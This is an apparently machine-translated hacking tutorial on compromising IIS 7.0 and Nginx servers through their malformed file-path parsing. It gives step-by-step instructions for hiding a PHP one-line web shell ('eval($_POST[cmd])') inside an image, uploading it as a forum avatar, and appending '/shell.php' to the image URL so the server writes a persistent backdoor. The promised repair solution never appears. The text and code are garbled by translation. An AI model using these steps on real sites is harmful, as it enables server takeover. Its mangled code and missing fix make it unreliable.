IIS7.0 vulnerability penetration Jay Chou's official website and repair solution

The penetration method is actually no different from that on the Internet.
 
You can check it online
 
Kill IIS7.0 malformed parsing 0-Day Vulnerability
 
Merge a PHP sentence image horse first. The merge method is as follows:
 
① DOS merge: copy 1.gif/B + 1.txt/ a asp.gif
 
② Use edjpgcom to merge images and one-sentence Trojans,
 
Find any image.
 
[Here's how to use edjpgcom: Open the folder where edjpgcom.exe is located, and drag the image you want to modify
 
Edjpgcom.exe, then edjpgcom.exe will automatically open and write the desired code]
 
One sentence:
 
<? PHP fputs (fopen ('Shell. php', 'w'), '<? Php eval ($ _ POST [cmd])?> ');?>
 
Find an nginx site, register a user, and then upload a merged image in the Forum.
 
Find the image address, add shell. php to the address, and run it in the browser.
 
Assume that the image address is http://www.bkjia.com/fuck/1.jpg
 
The execution address is http://www.bkjia.com/fuck/1.jpg/ shell. php
 
Then, shell. php is generated in the directory.
 
For example, www.2cto.com/tupian/shell. php
 
Shell. php is our one-sentence address. Connect the client with this one-sentence address.
 
The above is the whole process of Nginx taking the site, and IIS7.0's malformed Parsing is similar to this.
 
Upload to get the image address.
 
Add xx. php xx to the image format. Just suffix. php.
 
<? Fputs (fopen ("fuck. php", "w"), "<? Eval (\$ _ POST [fuck]) ;?> ")?>
 
 
 
Upload an image Trojan with one sentence to the Avatar, access the Avatar address, and add/xx. php at will.
 
The rest of you know!
 
The above is also very detailed!

Www.2cto.com: To be determined

Author: Noseay